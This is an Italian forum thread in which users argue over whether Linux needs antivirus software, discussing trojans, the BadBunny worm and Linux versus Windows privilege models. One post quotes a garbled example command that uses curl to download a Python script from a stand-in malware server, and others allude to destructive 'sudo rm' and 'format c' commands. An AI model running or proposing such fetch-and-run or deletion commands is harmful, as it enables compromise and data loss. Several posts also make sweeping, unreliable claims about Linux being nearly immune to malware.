perché nel 2009 non hai letto "la sicurezza" di firefox 3 e 3.5



clamAV

avast

avg

e

BitDefender

sono tutti antivirus per il solo ubuntu



P.S.

Linux è nato per andare a vedere siti porno senza prendere virus

al tempo non esistevano i virus, essendo un S.O. nuovo

adesso ci sono, e anche tanti..



e non dimentichiamoci di chi vanta la sicurezza in windows 7

non è un colabrodo, è una pentola senza fondo!!

Ma questa cosa della stringa in python la hai provata o te la sei sognata?

Provala e poi mi saprai dire se funziona. XD

Anche perche' non e' in python, ma e' un comando in tcsh (e pure sbagliato) che richiama bash che esegue un download di un file .py (questo e' presumibilmente uno script in pyhton, ma dopo lo scaricamento chi dovrebbe eseguirlo, e con quali permessi ???).

Quando avrai trovato un trojan VERO per linux saro' lieto di provarlo, sapro' dirti SE funziona, e SE funziona, fino a che punto funziona, COME dovrebbe funzionare, i danni che mi potrebbe fare e come faccio a ripararli (senza antivirus, beninteso ! :)

p.s. intanto ti metto una stellina, sono curioso di vedere i commenti di qualche altro utente linux.

@clarintux: dimentichi che per fare qualche danno, l'ipotetico script in python dovrebbe venire eseguito con privilegi di root. Per esempio, se io faccio uno script che apre una porta privilegiata (<1024, quelle destinate ai servizi di sistema) e provo a eseguirlo da utente, mi dice che non posso usare quella porta: solo se lo eseguo da root funziona.

P.S. Ah, scusa, vedo che hai aggiunto la quarta condizione !

P.P.S, @ibetuhot: Che discorsi fai? Se uno e' novizio e pure idiota si puo' convincere anche a mettere il pc in ammollo col detersivo e la candeggina per "ripulirlo" :)))

Ammettiamo che l'utente clicchi su quel falso link contenente in realtà la stringa



bash -c "curl http: some_malware-server'org/s.py;pyton/temp/… ..



cosa succede secondo te?



Si installa? Non si installa un bel nulla....



N.B.: quell'utente esperto ha detto che era possibile se:

1) si scaricava l'allegato trojan

2) ci si cliccava sopra sul desktop



N.B. 2: adesso sarebbero necessarie tre cose:

1) scaricare il trojan

2) rendere eseguibile il file

3) cliccarci sopra

4) inserire la password (se il trojan intende dare danni al sistema)



Quella stringa ha soltanto il compito di scaricare. Stop. Se l'utente non interviene volontariamente, finisce lì e non succede nulla: il trojan non ha effetto, non viene eseguito.



Quell'utente di cui parli ha detto che l'utente malcapitato dovrebbe VOLONTARIAMENTE installare qualcosa, nonostante gli avvertimenti del sistema. Se uno addirittura fornisce la password dopo aver cliccato su un link....



Se uno è novizio e *stupido*, non c'è bisogno di fare virus, trojan....che richiedono tutta questa collaborazione da parte dell'utente novizio e stupido: è più facile inserire sul proprio blog un comando ("sudo rm *********) e dire a questi novizi di digitare questo comando e inserire la password.

Sarebbe come dire ad un utente Windows di digitare "format c***"



Veramente io leggo:

"Sembra il virus albanese: per favore cancella tutto tuo disco.

Ripeto: è un trojan e contro i trojan non c'è nulla da fare in realtà.

Si basano sulla stupidità dell'utente."

"Se uno ti dice dai sudo rm eccetera (non scrivo il comando) e tu lo fai, non c'è antivirus-trojan-spyware ecc. che tenga."



Quindi la sicurezza non è data dall'antivirus...



Comunque certo che ci può cadere.....come può cadere nel credere di pulire il PC con Acido Solforico! Se l'utente scioglie il PC con l'acido solforico è anche colpa di Linux, ovviamente! Se poi quell'utente fa un mix di acido solforico e la candeggina (come dice stragatto) e muore, per colpa del cloro sviluppato.....è colpa di Linux, perché non c'è l'antivirus.



In ogni caso, se vuoi risposte da Guiodic quì ci sono diversi suoi articoli su Linux e i virus:

http://guiodic.wordpress.com/category/gnulinux/virus-e-gnulinux/



BadBunny tramite OpenOffice è semplicemente ridicolo. Inutile dire che anche questo non funziona. Mi spiego:

1) BadBunny è multipiattaforma....dovrebbe funzionare su Windows, Mac e Linux.

2) È contenuto in un file di OpenOffice Draw e per agire ha bisogno che l’utente autorizzi l’esecuzione delle macro contenute nel file. Una volta avviato provvede a scaricare un’immagine in cui un uomo con un costume da coniglio è ripreso in atti osceni.

3) Inoltre il BadBunny crea dei file contenenti script che variano a seconda del sistema operativo: in Linux crea degli script in Perl.

4) L'utente Linux deve avviare VOLONTARIAMENTE questi script.

5) Su Windows le cose possono essere più pericolose, in quanto il virus provvede autonomamente a modificare le impostazioni di Mirc, se presente, e ad avviare un file javascript, tutto al solo scopo di diffondersi.



Quindi su Linux questo worm non rappresenta una minaccia vera e propria. L’utente deve essere abbastanza ingenuo da avviarlo e la rigida gestione delle autorizzazioni degli utenti non permette al virus di modificare dei file di sistema. Inoltre, l’unico danno provocato è la visualizzazione dell’immagine offensiva.



Capirai che danno un worm che NON può danneggiare il sistema, ma può solo far visualizzare un CATTIVO CONIGLIETTO...



Secondo me non hai capito che, se anche si infetta quell'utente novizio e stupido, il virus non si riproduce, rimane confinato sul sistema di quell'utente. Non succede un contaggio a catena....

il fatto è che comunque, il virus o il troyan, anche se viene fatto, bisogna che sia l'utente che gli dia il permesso di attivarsi, e a meno di utenti masochisti, penso che nessuno lo faccia....



ad esempio se tu crei qualcosa di dannoso per un sistema linux, non può avviarsi automaticamente come windows, quindi possiamo stare abbastanza sicurI!



per quanto riguarda tutti i bug (a parte che molto probabilmente riguardano distribuzioni in via di sviluppo e quindi sono normali) vengono risplti nel giro di pochissimi giorni, al contrario di windows, che ci vogliono anche anni!



io sinceramente da quando sono passato ad ubuntu non ho più problemi, e non centra la diffusionie, i sistemi gnu/linux, per via di come sono strutturati, sono quelli più sicuri!



invece al contrario i sistemi windows, sono i più insicuri, e il fatto che (come con windows 7) peggiori sempre di più riguardo alla sicurezza, significa che alla microsoft non interessi tanto, in quanto lei ci guadagna solo a vendere sistemi così insicuri e instabili.......



come mi aspettavo, sono arrivati altri più esperti di me, a risponderti! e vedi come

1) scaricare il trojan

2) rendere eseguibile il file

3) cliccarci sopra



quindi non è così facile farsi infettare il sistema, bisogna mettercisi di impegno.... e tutto per installare un troyan.... non penso che sia roba che un utente voglia fare......



quando ero con windows, nonostante l'antivirus, avevo il pc infetto, ora invece, senza niente, è sano come un pesce.....



beh alla fine dei conti, si può dire che delle infezioni su linux possono avvenire, ma la probabilità (a causa delle procedure che queste devono subire perchè vengano applicate) è bassissima, ed infatti io non ho mai sentito di un utente che sia stato infettato......



collegandomi poi alla battuta di stragatto, se l'utente mettesse il pc in ammollo nell'olio, può stare tranquillo, in quanto tiene il pc fresco, e questo funziona lo stesso (come testato in un test) :-)





beh faccio io una domanda banale, come mai non ho trovato nessuno infettato con linux?.... poi insomma, micca scambio file di openoffice con tutti! devo essere proprio ingenuo.............







beh ma è logico che non ci sarà mai un sistema perfetto, ma io non capisco neanche gli user, che appena scoprono che c'è un bug per linux (che magari non era ancora una versione stabile, o che comunque quel bug sarebbe stato correto dopo pochi giorni) iniziano a dire che anche linux non è sicuro! insomma sul fatto che i sistemi gnu/linux siano i più sicuri, non ci piove, ma anche sul fatto che però comunque non siano immuni al 100%, però c'è da tener conto comunque che bisogna fare delle azioni alquanto stupide per farsi infettare il sistema, quindi possiamo dire che con un normale utilizzo, sono sicuri al 99,99% io sinceramente non mi farei tanti problemi!

Cominciamo con lo sfatare un falso mito: Linux non è *archietturalmente* più sicuro di Windows

Quello che rende Windows più "fragile" è in realtà la configurazione out-of-the-box, e la difficoltà che spesso si incontra nel modificare queste configurazioni. Non solo, si porta dietro un malcostume originato ai tempi di Windows 95, ovvero quello di usare account amministrativi anche quando non necessario, spesso anche "obbligati" dalle software house



Due esempi per chiarire il discorso

1) Fino a Windows2000, se ricordo bene, quando si accedeva a una risorsa di rete (Ad esempio una cartella condivisa), Windows, in automatico e di default, cercava di autenticarsi con le credenziali inserite al login, prima di presentare all'utente il form per inserire user e password; e per di più, tali credenziali transitavano IN CHIARO sulla rete locale. puoi immaginare come fosse relativamente semplice rubare le password di un utente all'interno della stessa rete

2) Sul portatile da cui sto scrivendo (Di qualche anno fa, con XP Home di serie), i software dati in dotazione per gestire profilo energetico, eccetera, funzionano solo da amministratore. Significa che da utente normale non posso passare, ad esempio, dalla modalità "massime prestazioni" a quella "massima autonomia": o lavoro come utente root, o devo usare "esegui come". Ora, io sono un minimo smaliziato, ma molti "utonti" che conosco, alla terza volta si loggherebbero come Admin e poi andrebbero spavaldi in rete



Per questi motivi (E non solo), gran parte dei malware scritti per Linux sono per lo più delle proof-of-concept, in grado di funzionare solo in determinate condizioni (Ad esempio, solo se eseguiti da Root). Condizioni che non sono riscontrabili in una istallazione media, vuoi per una migliore configurazione di base, vuoi per una cultura informatica mediamente più elevata tra gli utenti Linux che non tra gli utenti Windows; quindi mentre Sasser, Blaster ed altri malware per Windows sono finiti sui giornali generalisti, i malware per Linux continuano ad essere un fenomeno di nicchia





EDIT: come ti hanno già spiegato, non è così semplice scalare i privilegi su Linux. proprio per i motivi che ti ho elencato. Mica è come le vecchie versioni di outlook che aprivano direttamente gli allegati

Inoltre, l'esempio che fai tu non è considerabile "virus", per il semplice fatto che non è in grado di propagarsi da solo, se devi spedirlo tu via posta e l'utente deve eseguirlo. Sarebbe come considerare uno script batch che formatta il PC come un virus. E persino su Windows avresti dei problemi a spianare le macchine a cui lo mandi, se non lo eseguono come root

Poi si sa, contro i PEBKAC non c'è antivirus che tenga, ma questa è un'altra storia...

Ci sono anche degli antivirus per Linux... il più famoso è ClamAV (comunque servono più a proteggere Windows che Linux se sono installati insieme nello stesso pc...)

Credo che le risposte di Clarintux e di Stragatto siano le più complete possibili.



Non mi dilungo oltre.

Credo che con il diffondersi di Linux e Mac, questo sarà uno dei maggiori problemi di questi utenti. Infatti, se fino ad oggi i creatori di malware erano interessati maggiormente alla creazione di virus per Windows a causa dei molti utenti che utilizzavano i sistemi operativi Microsoft, oggi e in futuro, non sarà più così. Infatti, con il sempre crescente numero di utenti di Linux e Mac, truffatori e cybercriminali saranno sempre più interessati a colpire questi sistemi operativi. Il fatto che esistano pochi antivirus per Linux, rappresenta un problema soprattutto per questo, ed è dovuto al fatto che le case produttrici di antimalware non ritengono che sia conveniente crearne per l' ancora ridotto numero di questi utenti e di queste minacce. Comunque consolati, perchè se avessi Windows, i virus, i trojan, i worm e le altre minacce non sarebbero 863, ma molte di più (più di 10.000).